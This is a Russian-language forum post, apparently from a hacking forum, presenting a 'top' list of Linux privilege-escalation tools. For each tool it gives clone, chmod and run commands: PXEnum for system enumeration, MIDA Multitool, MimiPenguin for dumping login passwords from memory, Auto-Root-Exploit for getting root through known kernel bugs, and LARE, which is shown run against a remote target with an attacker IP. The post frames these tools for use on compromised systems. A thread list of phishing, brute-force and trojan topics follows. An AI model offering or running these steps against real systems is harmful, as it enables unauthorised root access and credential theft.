Интересно Повышаем привилегии в Linux: TOP утилит

E

_Emma_

Original poster
c82e09d54a9c0648dca25.png





Повышение привилегий в Linux

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

— Это сложное слово означает повышение привилегий,используя уязвимости в ОС или ПО,позволяет получить доступ к ресурсам которые обычного защищены.




PXEnum
Функция перечисления - является основной задачей данного скрипта.Скрипт отыскивает всю доступную информацию о система.Команды скрипта позволяют быстро находить хеши паролей,содержания директорий,сведения о системи,наличие серверов ,приложений,соеденений,пользователей.

Не требует root прав.Скачиваем скрипт командой ниже:

$ wget

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.





Установка PXEnum:

$ git clone

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


$ cd PXEnum/
$ chmod +x PXEnum.sh
$ bash PXEnum.sh



Другой вариант запуска PXEnum:

$ sh PXEnum.sh



MIDA Multitool
Другой интересный инструмент —

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

, созданный на базе менее популярных собратьев

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

и

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

, но предлагающий гораздо больше возможностей.

По воле разработчика MIDA Multitool объединяет в себе отдельные функции своих предшественников, а именно:

  • SysEnum — Bash-скрипт, предназначенный для получения основной информации о системе, включая следующие данные: текущий пользователь, IP-конфигурация, таблицы ARP, запущенные процессы;
  • RootHelper — призван помочь в деле эскалации привилегий в системе, которая была скомпрометирована, при помощи выполнения ряда перечислений и использования доверительных сценариев.
Установка MIDA Multitool в систему с GitHub:

$ git clone

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


$ cd Bash-Kit-Multitool
$ chmod +x bashkit.sh



Запускаем скрипта MIDA Multitool :

$ /.bashkit.sh

linux-privilege-escalation-1.png

Меню выбора действий после запуска MIDA Multitool


Информация о системе

linux-privilege-escalation-2.jpg

Данные об учетных записях в текущей системе

MimiPenguin
Задача данного скрипта - сброс пароля на вход в систему.Если так можно выразиться это аналог утилиты mimikatz для дампа пароля в Windows

Кроме того, MimiPenguin поддерживает такие приложения, как VSFTPd (активные подключения клиента FTP), Apache 2 (активные/старые сеансы HTTP BASIC AUTH, но для этого требуется Gcore) и OpenSSH-сервер (активные подключения SSH с использованием команды sudo). И вообще, необходимо сказать, что MimiPenguin нередко становится частью эксплоитов под Linux, так что тулза очень и очень востребована.



Установка MimiPenguin

$ git clone

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



linux-privilege-escalation-4.png

Окно терминала, отображающее процесс установки MimiPenguin


Запускаем скрипт,перейдя в его директорию

$ cd mimipenguin
$ ls –a
$ chmod +x mimipenguin.sh
$ ./mimipenguin.sh


linux-privilege-escalation-3.png

Результат работы MimiPenguin — все пароли как на ладони

Auto-Root-Exploit
Скрипт выполняет единственную цель получить root на текущую учётную запись с помощью известных багов.Поддерживает версия ядра Linux Kernel 2.6 - 4.8.0-41-generic

Устанавливаем Auto-Root-Exploit

$ git clone

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


$ cd Auto-Root-Exploit
$ chmod +x autoroot.sh



Проверка версии ядра

<span class="pln">$ uname </span><span class="pun">–</span><span class="pln">a</span>

linux-privilege-escalation-1.jpg

Получение сведений о версии ядра ОС в Kali Linux


Использование

$ bash autoroot.sh N



for kernel version 2.6 all
bash autoroot.sh 2

for kernel version 3 all
bash autoroot.sh 3

for kernel version 4 all
bash autoroot.sh 4

for freebsd & openbsd all
bash autoroot.sh bsd

for apple macos all
bash autoroot.sh app

for kernel 2.6,3,4 bsd & app all
bash autoroot.sh all



linux-privilege-escalation-.png

Стартовое меню выбора в Auto-Root-Exploit


linux-privilege-escalation-5.png

Результат работы Auto-Root-Exploit — получение root-прав на систему

LARE
На конец ещё один лёгкий скрипт,находя уязвимости в ядре ОС предоставляет root удалённо с атакующей машины.Использует локальные эксплойты для получения root для версий ядра Kernel v2.6 - v4.8



Устанавливаем скрипт LARE

$ git clone

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

&& cd LARE
$ chmod +x LARA.sh



Локальный запуск LARE

$ LARE.sh -a

или

$ ./LARE.sh -a

linux-privilege-escalation-6.png

Запуск LARE на локальной машине


Для запуска скрипта целевой машины в сети:

$ LARE.sh -l [Attackers-IP]

linux-privilege-escalation-7.png

Атака на удаленную машину в локальной сети


Запуск производится с машины подключенной к базе эксплойтов Git Hub

$ LARE.sh -l or ./LARE.sh -l
 
  • Like
Реакции: CMDfromBAT
J

Jonny 98200316

Original poster
Емма вижу ты очень много знаешь если не трудно давай спишемся где то?)
 
Название темы
Автор Заголовок Раздел Ответы Дата
Emilio_Gaviriya Статья Уязвимости в ядре Linux и привилегии через nf_tables и ksmbd. Анонимность и приватность 0
El_IRBIS Интересно Вредоносный код в дистрибутивах Linux: Понимание угрозы и меры безопасности. Вирусология 0
Support81 10 из 10: В Linux обнаружен встроенный бэкдор (CVE-2024-3094) Новости в сети 0
DOMINUS Проверено Защищенные криптованные смартфоны, ноутбуки, флеш-карты и SSD-диски на базе ОС Linux: обеспечение анонимности и безопасности в интернете Все что не подошло по разделу 2
semsvm Интересно Пассивный заработок от 2$+ в сутки - на своем ПК, Android, Linux! Корзина 1
R Kali linux какие бывают Свободное общение и флейм 1
R Установка языковый пакет на kali linux persistence Свободное общение и флейм 0
H Не могу установить драйвер Nvidia Kali Linux Все что не подошло по разделу 1
H Kali Linux картинка сыпится в крошки Все что не подошло по разделу 0
Denik Интересно Малварь для Linux, CronRAT, скрывается в cron job с неверными датами Новости в сети 0
B Услуги Linux администратора, настройка vps, серверов Ищу работу. Предлагаю свои услуги. 0
Ёшкин_кот Интересно Kali Linux Revealed (на русском) Полезные статьи 0
H Prey: Отслеживаем Linux компьютер Корзина 0
H Защита Linux-сервера. Что сделать в первую очередь Корзина 0
H PowerShell для пентестов в Kali Linux Корзина 0
H Новый Linux-модуль платформы TrickBot тайно атакует Windows-ПК Подробнее: https://www.securitylab.ru/news/510661.php Корзина 0
H Шифрование сообщений в GPG на Linux. Корзина 0
H Основы Linux для начинающего "Хакера" - Использование скриптов запуска Корзина 0
H Основы Linux для начинающего "Хакера" - Сети Корзина 0
1 Языки программирования на Linux Mint. Вопросы и интересы 3
Denik Интересно Проверяем вирусы на серверах Linux Полезные статьи 0
CMDfromBAT Интересно Взлом почты при помощи Hydra в Kali Linux Уязвимости и взлом 2
Д Аренда VPS/VDS сервера. Аренда VPS от 260 руб. Windows/Linux Server. Сайты/Хостинг/Сервера 3
V Kali Linux netsed Kali Linux 0
Denik Интересно Трояны для слежки под Windows, macOS, Linux, Android, iOS Анонимность и приватность 0
CMDfromBAT Интересно Ninjutsu-OS: "Kali Linux" в среде Windows Полезные статьи 48
T Проблема с иконками на kali linux kde Вопросы и интересы 1
Eteriass Интересно Мини VPN для Kali Linux/Nipe/ СИ/Фишинг/Мошенничество 1
Eteriass Фишинг на Kali linux/Shellphish/ СИ/Фишинг/Мошенничество 17
E Интересно Доступ к веб-камере при помощи Kali linux и CИ Уязвимости и взлом 5
E Чистим Linux Полезные статьи 0
T установка Kali linux 2020.1b Вопросы и интересы 1
CMDfromBAT Интересно RECREATOR-PHISHING - ЛУЧШИЙ ФИШИНГ ДЛЯ ЛЮБОЙ СТРАНИЦЫ! KALI LINUX СИ/Фишинг/Мошенничество 29
S Продам vps windows linux 2.50 $ месяц, вы также можете арендовать на час за 0.03 $ Сайты/Хостинг/Сервера 2
X /HumenError/Фишинг instagram/Kali linux/ СИ/Фишинг/Мошенничество 10
1 kali linux live не работают программы (wifite и тд.) Вопросы и интересы 11
E Администрирование LINUX Полезные статьи 3
M DistroTest - тестируем Linux в веб-браузере Полезные статьи 0
B Подготовительный курс Linux (2019) Полезные статьи 0
W Плюсы Linux (может не все). Полезные статьи 0
B [Сергей Никонов] Онлайн курс LINUX и GIT для начинающих — Видео уроки Linux / Git с нуля Kali Linux 0
M Atilo: разворачиваем linux-дистрибутив в Termux Полезные статьи 0
B Linux. Администрирование рабочих станций (2019) Полезные статьи 0
R Ошибка обновление в Kali Linux Вопросы и интересы 5
M Новости Kali Linux Kali Linux 0
O Google заблокировала популярные браузеры для Linux Новости в сети 0
CMDfromBAT LazyBruter - САМЫЙ БЫСТРЫЙ БРУТФОРС E-Mail(Kali Linux) Бруты/Парсеры/Чекеры 11
S Kali Linux на виртуалку Настройка системы для работы 1
S Как установить драйвера alpha на kali linux Вопросы и интересы 1
CMDfromBAT Интересно ВЗЛОМАЛ ПЕДОФИЛА. И ТЫ ТОЖЕ МОЖЕШЬ(Kali Linux) СИ/Фишинг/Мошенничество 12

Название темы